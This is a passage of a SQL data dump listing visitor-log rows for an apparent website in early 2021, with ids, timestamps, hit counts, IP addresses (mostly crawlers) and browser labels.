7327,1,1,0,0,'66.249.70.43','chrome'),(551023,1611478557,2,0,2,0,'66.249.70.47',''),(551024,1611479823,1,1,0,0,'66.249.70.45','chrome'),(551025,1611480326,1,0,1,0,'66.249.70.43',''),(551026,1611482435,1,1,0,0,'5.45.207.150','other'),(551027,1611483881,1,0,1,0,'66.249.70.47',''),(551028,1611487649,1,1,0,0,'66.249.70.43','chrome'),(551029,1611488869,2,2,0,0,'66.249.70.43','chrome'),(551030,1611491888,1,1,0,0,'66.249.70.47','chrome'),(551031,1611494287,1,1,0,0,'66.249.70.47','chrome'),(551032,1611497710,3,3,0,0,'176.37.90.125','other'),(551033,1611497872,2,2,0,0,'34.241.77.13','chrome'),(551034,1611500903,1,0,1,0,'66.249.70.47',''),(551035,1611501256,1,1,0,0,'66.249.70.45','chrome'),(551036,1611502705,1,1,0,0,'66.249.70.45','chrome'),(551037,1611507528,1,1,0,0,'66.249.70.43','chrome'),(551038,1611507764,1,1,0,0,'66.249.70.45','chrome'),(551039,1611508197,1,1,0,0,'5.45.207.150','other'),(551040,1611508365,2,2,0,0,'66.249.70.47','chrome'),(551041,1611509646,1,1,0,0,'66.249.70.47','chrome'),(551042,1611514863,2,1,1,0,'66.249.70.45',''),(551043,1611515300,1,1,0,0,'91.221.219.10','chrome'),(551044,1611517050,1,1,0,0,'31.13.127.112','other'),(551045,1611517097,1,0,1,0,'66.249.70.45',''),(551046,1611517157,1,1,0,0,'173.252.111.21','other'),(551047,1611527402,4,4,0,0,'18.192.214.70','chrome'),(551048,1611527907,1,1,0,0,'5.255.253.92','other'),(551049,1611528104,1,1,0,0,'173.252.127.26','other'),(551050,1611528107,1,1,0,0,'31.13.127.11','other'),(551051,1611528109,1,1,0,0,'69.171.251.23','other'),(551052,1611528129,1,1,0,0,'31.13.127.120','other'),(551053,1611528172,1,1,0,0,'173.252.127.34','other'),(551054,1611529892,1,1,0,0,'5.255.253.92','other'),(551055,1611536106,1,1,0,0,'66.249.70.43','chrome'),(551056,1611536951,2,2,0,0,'66.249.70.47','chrome'),(551057,1611537186,2,2,0,0,'66.249.70.45','chrome'),(551058,1611537645,1,1,0,0,'66.249.70.43','chrome'),(551059,1611539173,1,1,0,0,'66.249.70.45','chrome'),(551060,1611539474,1,1,0,0,'66.249.70.59','chrome'),(551061,1611552190,1,1,0,0,'66.249.70.47','chrome'),(551062,1611553234,1,0,1,0,'66.249.70.43',''),(551063,1611553248,2,1,1,0,'66.249.70.43',''),(551064,1611553627,2,2,0,0,'66.249.70.43','chrome'),(551065,1611553775,2,2,0,0,'35.180.147.121','chrome'),(551066,1611553943,3,3,0,0,'66.249.70.45','chrome'),(551067,1611554208,1,1,0,0,'66.249.70.47','chrome'),(551068,1611555147,1,1,0,0,'66.249.70.45','chrome'),(551069,1611555743,1,1,0,0,'66.249.70.47','chrome'),(551070,1611556124,1,1,0,0,'66.249.70.43','chrome'),(551071,1611556522,2,2,0,0,'66.249.70.45','chrome'),(551072,1611556606,1,1,0,0,'173.252.127.113','other'),(551073,1611557857,1,1,0,0,'66.249.70.43','chrome'),(551074,1611558590,2,2,0,0,'66.249.70.47','chrome'),(551075,1611558968,1,0,1,0,'66.249.70.43',''),(551076,1611559272,3,3,0,0,'66.249.70.45','chrome'),(551077,1611559415,3,3,0,0,'66.249.70.43','chrome'),(551078,1611559515,1,1,0,0,'66.249.70.47','chrome'),(551079,1611561336,1,1,0,0,'66.249.70.45','chrome'),(551080,1611562065,1,1,0,0,'69.171.251.15','other'),(551081,1611564643,1,1,0,0,'91.196.178.75','chrome'),(551082,1611564861,1,1,0,0,'66.249.70.43','chrome'),(551083,1611565825,1,1,0,0,'66.249.70.45','chrome'),(551084,1611566825,1,1,0,0,'66.249.70.47','chrome'),(551085,1611567243,2,2,0,0,'52.65.15.196','chrome'),(551086,1611568547,2,2,0,0,'66.249.70.43','chrome'),(551087,1611569784,1,0,1,0,'66.249.70.43',''),(551088,1611571567,1,1,0,0,'66.249.70.47','chrome'),(551089,1611576092,1,0,1,0,'66.249.70.45',''),(551090,1611579583,1,0,1,0,'66.249.70.43',''),(551091,1611579693,1,1,0,0,'66.249.70.43','chrome'),(551092,1611580469,1,1,0,0,'31.13.127.16','other'),(551093,1611580732,1,1,0,0,'66.249.70.43','chrome'),(551094,1611581065,1,1,0,0,'66.249.70.47','chrome'),(551095,1611582228,1,1,0,0,'31.13.127.11','other'),(551096,1611582832,1,1,0,0,'66.249.70.45','chrome'),(551097,1611583708,1,1,0,0,'66.249.70.43','chrome'),(551098,1611584641,1,1,0,0,'66.249.70.43','chrome'),(551099,1611585646,1,0,1,0,'66.249.70.43',''),(551100,1611585947,2,2,0,0,'66.249.70.45','chrome'),(551101,1611586393,2,2,0,0,'66.249.70.47','chrome'),(551102,1611586650,1,1,0,0,'66.249.70.43','chrome'),(551103,1611587459,1,1,0,0,'5.255.253.92','other'),(551104,1611587586,1,1,0,0,'66.249.70.43','chrome'),(551105,1611590715,1,1,0,0,'66.249.70.47','chrome'),(551106,1611591475,1,1,0,0,'5.255.253.92','other'),(551107,1611592869,1,1,0,0,'66.249.70.43','chrome'),(551108,1611593201,1,1,0,0,'66.249.70.47','chrome'),(551109,1611594409,2,2,0,0,'52.192.73.251','chrome'),(551110,1611596077,1,1,0,0,'66.249.70.45','chrome'),(551111,1611599121,1,1,0,0,'66.249.70.47','chrome'),(551112,1611600984,1,1,0,0,'66.249.70.43','chrome'),(551113,1611602023,1,1,0,0,'173.252.111.113','other'),(551114,1611602024,1,1,0,0,'173.252.111.13','other'),(551115,1611604493,1,1,0,0,'5.45.207.186','other'),(551116,1611605541,1,1,0,0,'66.249.70.45','chrome'),(551117,1611606608,1,1,0,0,'66.249.70.43','chrome'),(551118,1611606903,1,1,0,0,'66.249.70.45','chrome'),(551119,1611608243,1,0,1,0,'66.249.70.45',''),(551120,1611608306,1,1,0,0,'151.42.220.212','chrome'),(551121,1611610224,1,1,0,0,'66.249.70.43','chrome'),(551122,1611611496,1,1,0,0,'66.249.70.45','chrome'),(551123,1611617901,3,3,0,0,'66.249.70.43','chrome'),(551124,1611618276,2,2,0,0,'66.249.70.45','chrome'),(551125,1611620879,1,0,1,0,'66.249.70.43',''),(551126,1611622128,1,1,0,0,'66.249.70.47','chrome'),(551127,1611622860,1,0,1,0,'66.249.70.43',''),(551128,1611623949,1,1,0,0,'66.249.70.47','chrome'),(551129,1611629808,1,1,0,0,'66.249.70.47','chrome'),(551130,1611630169,1,1,0,0,'54.202.15.194','chrome'),(551131,1611634103,1,0,1,0,'66.249.70.43',''),(551132,1611634369,2,2,0,0,'66.249.70.43','chrome'),(551133,1611635223,1,0,1,0,'66.249.70.47',''),(551134,1611635447,1,1,0,0,'66.249.70.47','chrome'),(551135,1611636263,1,1,0,0,'66.249.70.57','chrome'),(551136,1611636510,1,1,0,0,'66.249.70.59','chrome'),(551137,1611641836,1,1,0,0,'66.249.70.45','chrome'),(551138,1611643783,1,1,0,0,'66.249.70.61','chrome'),(551139,1611645217,1,1,0,0,'66.249.70.47','chrome'),(551140,1611645422,1,1,0,0,'66.249.70.45','chrome'),(551141,1611647382,1,1,0,0,'91.196.178.75','chrome'),(551142,1611649596,2,1,1,0,'66.249.70.45',''),(551143,1611650818,1,0,1,0,'66.249.70.45',''),(551144,1611656397,1,1,0,0,'66.249.70.45','chrome'),(551145,1611656951,1,1,0,0,'31.13.127.118','other'),(551146,1611656952,1,1,0,0,'31.13.127.11','other'),(551147,1611657010,1,1,0,0,'31.13.127.26','other'),(551148,1611657012,1,1,0,0,'173.252.95.22','other'),(551149,1611657051,1,1,0,0,'173.252.111.23','other'),(551150,1611657052,1,1,0,0,'173.252.111.13','other'),(551151,1611657609,1,1,0,0,'66.249.70.45','chrome'),(551152,1611658202,1,1,0,0,'66.249.70.47','chrome'),(551153,1611659547,1,1,0,0,'66.249.70.43','chrome'),(551154,1611661563,1,1,0,0,'66.249.70.45','chrome'),(551155,1611661852,1,1,0,0,'66.249.70.47','chrome'),(551156,1611662187,1,1,0,0,'66.249.70.43','chrome'),(551157,1611666008,1,1,0,0,'66.249.70.45','chrome'),(551158,1611666096,1,1,0,0,'66.249.70.47','chrome'),(551159,1611667481,1,1,0,0,'66.249.70.45','chrome'),(551160,1611676707,1,1,0,0,'66.249.70.45','chrome'),(551161,1611678672,2,2,0,0,'31.13.127.10','other'),(551162,1611678680,1,1,0,0,'178.133.233.130','chrome'),(551163,1611678681,1,1,0,0,'31.13.127.28','other'),(551164,1611678738,1,1,0,0,'31.13.127.3','other'),(551165,1611678739,1,1,0,0,'31.13.127.27','other'),(551167,1611678740,1,1,0,0,'31.13.127.112','other'),(551168,1611679882,1,0,1,0,'66.249.70.47',''),(551169,1611681058,1,1,0,0,'173.252.127.36','other'),(551170,1611682152,1,1,0,0,'66.249.70.43','chrome'),(551171,1611682217,2,2,0,0,'66.249.70.47','chrome'),(551172,1611683396,1,1,0,0,'66.249.70.47','chrome'),(551173,1611685244,1,1,0,0,'66.249.70.47','chrome'),(551174,1611685655,1,1,0,0,'66.249.70.43','chrome'),(551175,1611686996,1,1,0,0,'31.43.253.138','other'),(551176,1611687586,1,1,0,0,'31.13.127.112','other'),(551177,1611687587,1,1,0,0,'69.171.251.24','other'),(551178,1611687600,1,1,0,0,'66.249.70.45','chrome'),(551179,1611693586,1,1,0,0,'5.255.253.87','other'),(551180,1611693782,1,1,0,0,'5.255.253.92','other'),(551181,1611694402,1,1,0,0,'173.252.127.17','other'),(551182,1611694404,1,1,0,0,'69.171.251.116','other'),(551183,1611697319,1,1,0,0,'69.171.251.22','other'),(551184,1611697326,1,1,0,0,'31.13.127.6','other'),(551185,1611697327,1,1,0,0,'31.13.127.20','other'),(551186,1611697710,1,1,0,0,'66.249.70.45','chrome'),(551187,1611698102,1,1,0,0,'5.255.253.92','other'),(551188,1611701347,2,1,1,0,'66.249.70.47',''),(551189,1611706433,2,1,1,0,'66.249.70.43',''),(551190,1611706643,1,1,0,0,'66.220.149.6','other'),(551191,1611708781,1,1,0,0,'66.249.70.47','chrome'),(551192,1611709975,1,1,0,0,'5.255.253.92','other'),(551193,1611711628,1,1,0,0,'5.255.231.133','other'),(551194,1611712656,1,1,0,0,'66.249.70.43','chrome'),(551195,1611712969,1,1,0,0,'66.249.70.45','chrome'),(551196,1611713745,1,1,0,0,'66.249.70.47','chrome'),(551197,1611714193,1,1,0,0,'66.249.70.43','chrome'),(551198,1611714201,1,1,0,0,'66.249.70.45','chrome'),(551199,1611718163,1,1,0,0,'66.249.70.45','chrome'),(551200,1611719543,1,1,0,0,'66.249.70.47','chrome'),(551201,1611720901,1,0,1,0,'66.249.70.45',''),(551202,1611721852,1,1,0,0,'66.249.70.43','chrome'),(551203,1611722774,1,1,0,0,'5.255.253.92','other'),(551204,1611723716,1,1,0,0,'5.255.253.87','other'),(551205,1611726113,1,1,0,0,'66.249.70.43','chrome'),(551206,1611728918,1,1,0,0,'66.249.70.47','chrome'),(551207,1611731011,1,1,0,0,'66.249.70.45','chrome'),(551208,1611733918,1,1,0,0,'66.249.70.47','chrome'),(551209,1611734343,1,0,1,0,'66.249.70.45',''),(551210,1611734421,1,1,0,0,'66.249.70.43','chrome'),(551211,1611736127,1,0,1,0,'66.249.70.43',''),(551212,1611738112,1,1,0,0,'5.255.253.87','other'),(551213,1611738841,1,0,1,0,'66.249.70.45',''),(551214,1611739441,1,1,0,0,'66.220.149.26','other'),(551215,1611739442,1,1,0,0,'69.171.251.30','other'),(551216,1611744576,1,1,0,0,'66.249.70.45','chrome'),(551217,1611745283,1,1,0,0,'91.124.210.141','firefox'),(551218,1611746256,1,1,0,0,'66.249.70.43','chrome'),(551219,1611746298,1,1,0,0,'66.249.70.45','chrome'),(551220,1611747233,1,1,0,0,'66.249.70.45','chrome'),(551221,1611750004,2,2,0,0,'66.249.70.47','chrome'),(551222,1611753336,1,1,0,0,'66.249.70.45','chrome'),(551223,1611754186,1,1,0,0,'31.13.127.6','other'),(551224,1611755046,2,2,0,0,'35.181.87.238','chrome'),(551225,1611758328,1,1,0,0,'66.249.70.47','chrome'),(551226,1611759239,1,1,0,0,'5.255.253.92','other'),(551227,1611782585,2,2,0,0,'66.249.70.43','chrome'),(551228,1611782799,1,1,0,0,'66.249.70.45','chrome'),(551229,1611786451,1,1,0,0,'66.249.70.43','chrome'),(551230,1611789552,1,0,1,0,'66.249.70.43',''),(551231,1611790607,1,1,0,0,'5.255.253.92','other'),(551232,1611790730,1,1,0,0,'31.13.127.116','other'),(551233,1611794160,1,0,1,0,'66.249.70.45',''),(551234,1611797644,1,1,0,0,'5.255.253.92','other'),(551235,1611799317,1,1,0,0,'5.255.253.92','other'),(551236,1611799853,1,1,0,0,'66.249.70.47','chrome'),(551237,1611803506,1,1,0,0,'66.249.70.45','chrome'),(551238,1611804166,1,1,0,0,'66.249.70.47','chrome'),(551239,1611805352,1,0,1,0,'66.249.70.43',''),(551240,1611806038,1,0,1,0,'66.249.70.47',''),(551241,1611807910,1,1,0,0,'66.249.70.45','chrome'),(551242,1611811901,1,1,0,0,'66.249.70.43','chrome'),(551243,1611812579,1,1,0,0,'5.255.253.92','other'),(551244,1611813441,1,1,0,0,'66.249.70.43','chrome'),(551245,1611815687,1,1,0,0,'5.255.253.92','other'),(551246,1611816384,1,1,0,0,'66.249.70.45','chrome'),(551247,1611821409,1,1,0,0,'31.13.127.3','other'),(551248,1611821469,1,1,0,0,'173.252.127.31','other'),(551249,1611821474,1,1,0,0,'69.171.251.116','other'),(551250,1611821745,1,1,0,0,'69.171.251.14','other'),(551251,1611821768,1,1,0,0,'31.13.127.117','other'),(551252,1611821848,1,1,0,0,'31.13.127.22','other'),(551253,1611822181,1,1,0,0,'31.13.127.15','other'),(551254,1611822191,1,1,0,0,'46.211.83.175','chrome'),(551255,1611822192,1,1,0,0,'31.13.127.12','other'),(551256,1611822342,1,1,0,0,'46.211.40.212','chrome'),(551257,1611822374,1,1,0,0,'31.13.127.1','other'),(551258,1611822453,1,1,0,0,'31.13.127.8','other'),(551259,1611822454,1,1,0,0,'31.13.127.24','other'),(551260,1611823033,1,0,1,0,'66.249.70.45',''),(551261,1611824036,1,1,0,0,'91.196.178.75','chrome'),(551262,1611825098,1,1,0,0,'66.249.70.47','chrome'),(551263,1611830750,2,2,0,0,'66.249.70.47','chrome'),(551264,1611832030,1,1,0,0,'66.249.70.43','chrome'),(551265,1611835545,1,1,0,0,'66.249.70.47','chrome'),(551266,1611836051,1,0,1,0,'66.249.70.45',''),(551267,1611836066,1,1,0,0,'66.249.70.43','chrome'),(551268,1611836179,1,1,0,0,'66.249.70.45','chrome'),(551269,1611836509,1,1,0,0,'5.255.253.92','other'),(551270,1611838449,1,1,0,0,'66.249.70.45','chrome'),(551271,1611839422,1,1,0,0,'31.13.127.7','other'),(551273,1611840124,1,1,0,0,'66.249.70.45','chrome'),(551274,1611840558,1,1,0,0,'69.171.251.4','other'),(551275,1611840698,1,1,0,0,'31.13.103.14','other'),(551276,1611845621,1,1,0,0,'69.171.251.15','other'),(551277,1611846050,1,1,0,0,'31.13.127.116','other'),(551278,1611846051,1,1,0,0,'31.13.127.14','other'),(551279,1611846060,1,1,0,0,'37.73.124.255','chrome'),(551280,1611846624,1,1,0,0,'31.13.103.15','other'),(551281,1611846640,11,11,0,0,'5.255.253.92','other'),(551282,1611846880,3,3,0,0,'5.255.253.87','other'),(551283,1611853920,1,1,0,0,'66.249.70.45','chrome'),(551284,1611854461,1,1,0,0,'94.153.14.98','chrome'),(551285,1611855694,1,1,0,0,'66.249.70.47','chrome'),(551286,1611856385,1,0,1,0,'66.249.70.45',''),(551287,1611856723,1,1,0,0,'178.94.193.171','chrome'),(551288,1611859788,1,1,0,0,'46.211.93.71','chrome'),(551289,1611861366,1,1,0,0,'66.249.70.47','chrome'),(551290,1611863441,1,1,0,0,'66.249.70.47','chrome'),(551291,1611863789,1,1,0,0,'5.255.253.92','other'),(551292,1611867268,1,1,0,0,'69.171.251.18','other'),(551293,1611867315,1,1,0,0,'31.13.127.2','other'),(551295,1611867317,1,1,0,0,'213.76.217.160','chrome'),(551296,1611868320,1,1,0,0,'69.171.251.7','other'),(551297,1611869600,1,1,0,0,'69.171.251.117','other'),(551298,1611872555,1,1,0,0,'5.255.253.92','other'),(551299,1611873781,1,1,0,0,'5.255.253.92','other'),(551300,1611874848,1,1,0,0,'5.255.253.92','other'),(551301,1611877025,1,1,0,0,'173.252.127.38','other'),(551302,1611877027,1,1,0,0,'69.171.251.25','other'),(551303,1611879063,2,2,0,0,'5.255.253.92','other'),(551304,1611882333,1,1,0,0,'5.255.253.92','other'),(551305,1611885450,1,1,0,0,'66.249.70.47','chrome'),(551306,1611887730,1,1,0,0,'66.249.70.43','chrome'),(551307,1611890509,1,1,0,0,'66.249.70.43','chrome'),(551308,1611892894,1,1,0,0,'94.153.59.173','chrome'),(551309,1611892947,1,1,0,0,'31.13.115.21','other'),(551310,1611892977,1,1,0,0,'37.73.212.91','chrome'),(551311,1611893000,2,2,0,0,'31.13.115.19','other'),(551312,1611897492,1,0,1,0,'66.249.70.43',''),(551313,1611898106,1,1,0,0,'5.255.253.92','other'),(551314,1611898803,1,1,0,0,'66.249.70.47','chrome'),(551315,1611899826,1,1,0,0,'69.171.251.4','other'),(551316,1611900430,1,0,1,0,'66.249.70.45',''),(551317,1611904398,1,1,0,0,'66.249.70.43','chrome'),(551318,1611908739,1,1,0,0,'66.249.70.45','chrome'),(551319,1611917331,2,1,1,0,'66.249.70.45',''),(551320,1611918161,1,1,0,0,'66.249.70.45','chrome'),(551321,1611919247,1,0,1,0,'66.249.70.45',''),(551322,1611924913,1,1,0,0,'213.180.203.181','other'),(551323,1611925413,1,1,0,0,'66.249.70.47','chrome'),(551324,1611929061,1,1,0,0,'173.252.95.19','other'),(551325,1611929681,1,1,0,0,'69.171.251.26','other'),(551326,1611929888,1,1,0,0,'185.237.217.7','chrome'),(551327,1611930575,1,1,0,0,'66.249.70.43','chrome'),(551328,1611930675,1,1,0,0,'66.249.70.45','chrome'),(551329,1611934334,1,1,0,0,'5.255.253.92','other'),(551330,1611934815,1,1,0,0,'66.249.70.47','chrome'),(551331,1611935422,1,1,0,0,'5.255.253.92','other'),(551332,1611936853,1,0,1,0,'66.249.70.45',''),(551333,1611938170,1,1,0,0,'66.249.70.45','chrome'),(551334,1611939175,1,1,0,0,'116.203.194.215','other'),(551335,1611940990,1,1,0,0,'66.249.70.45','chrome'),(551336,1611944415,1,1,0,0,'66.249.70.47','chrome'),(551337,1611946440,1,1,0,0,'66.249.70.47','chrome'),(551338,1611947589,1,0,1,0,'66.249.70.43',''),(551339,1611948605,1,1,0,0,'91.196.178.185','chrome'),(551340,1611948645,1,1,0,0,'173.252.111.116','other'),(551341,1611948870,1,1,0,0,'173.252.111.8','other'),(551342,1611949996,1,1,0,0,'66.249.70.43','chrome'),(551343,1611952320,1,1,0,0,'109.70.106.130','other'),(551344,1611952523,1,1,0,0,'66.249.70.43','chrome'),(551345,1611955494,1,1,0,0,'23.228.109.147','chrome'),(551346,1611956396,1,1,0,0,'5.255.253.77','other'),(551347,1611956564,1,1,0,0,'5.45.207.78','other'),(551348,1611960130,1,1,0,0,'5.255.253.92','other'),(551349,1611961968,1,1,0,0,'5.255.253.92','other'),(551350,1611962168,1,1,0,0,'66.249.70.43','chrome'),(551351,1611963868,1,1,0,0,'66.249.70.43','chrome'),(551352,1611965570,1,0,1,0,'66.249.70.45',''),(551353,1611965994,1,1,0,0,'66.249.70.45','chrome'),(551354,1611966086,1,1,0,0,'213.180.203.73','other'),(551355,1611967772,1,0,1,0,'66.249.70.43',''),(551356,1611969655,1,1,0,0,'66.249.70.45','chrome'),(551357,1611971649,2,2,0,0,'66.249.70.47','chrome'),(551358,1611972060,1,0,1,0,'66.249.70.43',''),(551359,1611975481,1,1,0,0,'5.255.253.92','other'),(551360,1611976664,5,5,0,0,'5.255.253.92','other'),(551361,1611976705,1,1,0,0,'5.255.253.87','other'),(551362,1611976850,1,1,0,0,'5.45.207.150','other'),(551363,1611978943,2,2,0,0,'5.255.253.92','other'),(551364,1611979087,1,0,1,0,'66.249.70.45',''),(551365,1611983600,1,0,1,0,'66.249.70.45',''),(551366,1611987050,1,1,0,0,'66.249.70.43','chrome'),(551367,1611991321,3,3,0,0,'66.249.70.45','chrome'),(551368,1611995117,1,0,1,0,'66.249.70.47',''),(551369,1611995499,1,1,0,0,'195.146.37.241','firefox'),(551370,1611997320,1,1,0,0,'31.13.127.118','other'),(551371,1611998310,1,1,0,0,'66.249.70.43','chrome'),(551372,1612000952,2,2,0,0,'34.215.69.55','chrome'),(551373,1612001205,1,0,1,0,'66.249.70.43',''),(551374,1612001975,1,1,0,0,'195.154.62.232','firefox'),(551375,1612004250,1,1,0,0,'23.228.109.147','chrome'),(551376,1612005770,1,0,1,0,'66.249.70.47',''),(551377,1612009092,1,1,0,0,'69.171.251.5','other'),(551378,1612011516,4,4,0,0,'109.70.104.23','chrome'),(551379,1612012521,1,1,0,0,'66.249.70.43','chrome'),(551380,1612013550,1,1,0,0,'54.221.27.173','chrome'),(551381,1612015474,1,1,0,0,'31.13.103.6','other'),(551382,1612021761,1,1,0,0,'66.249.70.45','chrome'),(551383,1612037412,1,1,0,0,'173.252.127.35','other'),(551384,1612037420,1,1,0,0,'173.252.111.11','other'),(551385,1612037422,1,1,0,0,'69.171.251.26','other'),(551386,1612037431,1,1,0,0,'173.252.111.2','other'),(551387,1612037432,1,1,0,0,'173.252.111.9','other'),(551388,1612038800,1,1,0,0,'5.255.253.92','other'),(551389,1612038987,1,1,0,0,'173.252.127.13','other'),(551390,1612039830,4,4,0,0,'5.255.253.92','other'),(551391,1612042567,1,0,1,0,'66.249.70.47',''),(551392,1612045044,1,1,0,0,'66.249.70.45','chrome'),(551393,1612050133,1,0,1,0,'66.249.70.47',''),(551394,1612053560,2,2,0,0,'66.249.70.43','chrome'),(551395,1612056401,1,0,1,0,'66.249.70.45',''),(551396,1612061183,1,1,0,0,'66.249.70.47','chrome'),(551397,1612066464,1,0,1,0,'66.249.70.47',''),(551398,1612071541,1,1,0,0,'69.171.251.12','chrome'),(551399,1612071555,1,1,0,0,'69.171.251.8','chrome'),(551400,1612071556,1,1,0,0,'69.171.251.18','chrome'),(551401,1612076184,1,1,0,0,'31.13.127.7','other'),(551402,1612081111,2,0,2,0,'66.249.70.45',''),(551403,1612092162,2,0,2,0,'66.249.70.47',''),(551404,1612095736,1,0,1,0,'66.249.70.45',''),(551405,1612103452,1,1,0,0,'173.252.95.12','other'),(551406,1612111035,1,0,1,0,'66.249.70.45',''),(551407,1612113270,1,1,0,0,'37.59.47.61','other'),(551408,1612113667,1,1,0,0,'31.13.127.4','other'),(551409,1612113728,1,1,0,0,'31.13.127.25','other'),(551410,1612117289,1,1,0,0,'185.237.217.11','chrome'),(551411,1612117329,1,1,0,0,'185.237.217.11','other'),(551412,1612117360,2,2,0,0,'128.124.171.116','other'),(551413,1612122379,1,1,0,0,'91.196.178.90','chrome'),(551414,1612124859,1,1,0,0,'64.225.13.184','other'),(551415,1612129186,1,1,0,0,'159.203.69.116','other'),(551416,1612142864,2,2,0,0,'27.115.124.101','chrome'),(551417,1612142890,1,1,0,0,'42.236.10.114','chrome'),(551418,1612142916,1,1,0,0,'42.236.10.117','chrome'),(551419,1612143042,1,1,0,0,'42.236.10.75','chrome'),(551420,1612143067,1,1,0,0,'42.236.10.84','chrome'),(551421,1612143901,1,1,0,0,'171.13.14.75','chrome'),(551422,1612144004,1,1,0,0,'171.13.14.4','chrome'),(551423,1612145987,1,0,1,0,'66.249.70.43',''),(551424,1612155530,1,1,0,0,'173.252.127.10','other'),(551425,1612156182,1,1,0,0,'128.124.171.116','other'),(551426,1612156384,1,0,1,0,'66.249.70.47',''),(551427,1612156395,1,0,1,0,'66.249.70.45',''),(551428,1612164939,2,2,0,0,'66.249.70.47','chrome'),(551429,1612165774,1,1,0,0,'69.171.251.3','other'),(551430,1612171836,1,1,0,0,'66.220.149.5','other'),(551431,1612176819,1,1,0,0,'5.255.253.92','other'),(551432,1612176861,1,1,0,0,'66.220.149.30','other'),(551433,1612179821,3,3,0,0,'23.228.109.147','chrome'),(551434,1612179890,1,0,1,0,'66.249.70.43',''),(551435,1612180742,1,1,0,0,'31.13.127.11','other'),(551436,1612186416,1,1,0,0,'66.249.70.43','chrome'),(551437,1612186571,1,1,0,0,'66.249.70.45','chrome'),(551438,1612189174,1,1,0,0,'66.249.70.43','chrome'),(551439,1612193222,1,1,0,0,'66.249.70.45','chrome'),(551440,1612198332,1,1,0,0,'31.13.127.12','other'),(551441,1612212434,1,0,1,0,'66.249.70.45',''),(551442,1612214587,1,0,1,0,'66.249.70.43',''),(551443,1612219671,1,0,1,0,'66.249.70.47',''),(551444,1612234085,1,1,0,0,'66.249.70.43','chrome'),(551445,1612237237,1,1,0,0,'66.249.70.47','chrome'),(551446,1612239691,1,0,1,0,'66.249.70.47',''),(551447,1612248335,1,1,0,0,'204.12.250.2','firefox'),(551448,1612259965,1,0,1,0,'66.249.70.45',''),(551449,1612269545,1,1,0,0,'23.228.109.147','chrome'),(551450,1612271915,1,1,0,0,'66.249.70.45','chrome'),(551451,1612272213,1,1,0,0,'66.249.70.43','chrome'),(551452,1612273144,1,1,0,0,'31.13.127.15','other'),(551453,1612273161,1,1,0,0,'31.13.127.118','other'),(551454,1612273163,1,1,0,0,'173.252.127.15','other'),(551456,1612273996,1,1,0,0,'31.13.127.5','other'),(551457,1612273997,1,1,0,0,'69.171.251.3','other'),(551458,1612274100,1,1,0,0,'66.249.70.47','chrome'),(551459,1612274383,1,1,0,0,'66.249.70.45','chrome'),(551460,1612275448,1,0,1,0,'66.249.70.47',''),(551461,1612300798,1,1,0,0,'31.13.127.2','other'),(551462,1612300800,1,1,0,0,'69.171.251.15','other'),(551463,1612305627,1,1,0,0,'66.249.70.47','chrome'),(551464,1612305655,1,1,0,0,'66.249.70.43','chrome'),(551465,1612307305,1,1,0,0,'66.249.70.43','chrome'),(551466,1612310039,1,0,1,0,'66.249.70.47',''),(551467,1612310807,1,1,0,0,'66.249.70.45','chrome'),(551468,1612311181,1,1,0,0,'66.249.70.47','chrome'),(551469,1612313202,1,1,0,0,'66.249.70.43','chrome'),(551470,1612313444,2,2,0,0,'66.249.70.45','chrome'),(551471,1612314964,1,1,0,0,'66.249.70.45','chrome'),(551472,1612314994,1,1,0,0,'66.249.70.43','chrome'),(551473,1612316156,1,1,0,0,'66.249.70.47','chrome'),(551474,1612319648,1,1,0,0,'66.249.70.43','chrome'),(551475,1612326793,1,1,0,0,'66.249.70.45','chrome'),(551476,1612327946,1,1,0,0,'66.249.70.45','chrome'),(551477,1612328341,1,1,0,0,'66.249.70.43','chrome'),(551478,1612328638,1,1,0,0,'5.255.253.92','other'),(551479,1612330783,1,1,0,0,'66.249.70.43','chrome'),(551480,1612331723,4,4,0,0,'34.215.69.55','chrome'),(551481,1612335126,2,2,0,0,'66.249.70.45','chrome'),(551482,1612344535,2,2,0,0,'66.249.70.43','chrome'),(551483,1612344578,2,2,0,0,'91.196.178.83','chrome'),(551484,1612344616,1,1,0,0,'66.249.70.47','chrome'),(551485,1612345708,1,1,0,0,'91.196.178.83','chrome'),(551486,1612346018,1,0,1,0,'66.249.70.45',''),(551487,1612347337,1,1,0,0,'91.196.178.83','chrome'),(551488,1612355605,1,1,0,0,'91.196.178.86','chrome'),(551489,1612356593,1,1,0,0,'91.196.178.86','chrome'),(551490,1612359269,1,1,0,0,'94.179.21.25','chrome'),(551491,1612362371,1,0,1,0,'66.249.70.45',''),(551492,1612366968,1,1,0,0,'5.255.253.92','other'),(551493,1612367514,1,1,0,0,'46.133.205.202','other'),(551494,1612369895,1,1,0,0,'69.171.251.30','other'),(551495,1612369896,1,1,0,0,'31.13.103.10','other'),(551496,1612370066,1,1,0,0,'91.196.178.146','other'),(551497,1612375702,1,1,0,0,'66.249.70.45','chrome'),(551498,1612377505,1,1,0,0,'173.252.111.12','other'),(551500,1612378151,1,1,0,0,'66.249.70.43','chrome'),(551501,1612388508,2,2,0,0,'66.249.70.47','chrome'),(551502,1612388825,1,1,0,0,'66.249.70.43','chrome'),(551503,1612393477,1,1,0,0,'31.13.103.7','other'),(551505,1612396866,1,1,0,0,'66.249.70.47','chrome'),(551506,1612398557,2,2,0,0,'66.249.70.45','chrome'),(551507,1612398696,1,1,0,0,'66.249.70.43','chrome'),(551508,1612402877,2,2,0,0,'66.249.70.47','chrome'),(551509,1612402931,1,1,0,0,'66.249.70.45','chrome'),(551510,1612406126,1,1,0,0,'66.249.70.47','chrome'),(551511,1612407883,1,1,0,0,'66.249.70.47','chrome'),(551512,1612408004,1,1,0,0,'66.249.70.43','chrome'),(551513,1612410799,1,1,0,0,'66.249.70.45','chrome'),(551514,1612411442,1,1,0,0,'66.249.70.47','chrome'),(551515,1612413391,1,1,0,0,'66.249.70.43','chrome'),(551516,1612415210,1,1,0,0,'66.249.70.47','chrome'),(551517,1612415215,1,1,0,0,'66.249.70.43','chrome'),(551518,1612418071,2,2,0,0,'66.249.70.47','chrome'),(551519,1612418368,2,2,0,0,'66.249.70.43','chrome'),(551520,1612418519,1,1,0,0,'213.180.203.178','other'),(551521,1612419980,2,2,0,0,'66.249.70.47','chrome'),(551522,1612422570,1,1,0,0,'66.249.70.43','chrome'),(551523,1612422573,1,1,0,0,'66.249.70.45','chrome'),(551524,1612424362,1,1,0,0,'66.249.70.47','chrome'),(551525,1612425729,1,1,0,0,'66.249.70.43','chrome'),(551526,1612427221,1,1,0,0,'66.249.70.43','chrome'),(551527,1612427957,1,1,0,0,'66.249.70.45','chrome'),(551528,1612429300,1,1,0,0,'66.249.70.47','chrome'),(55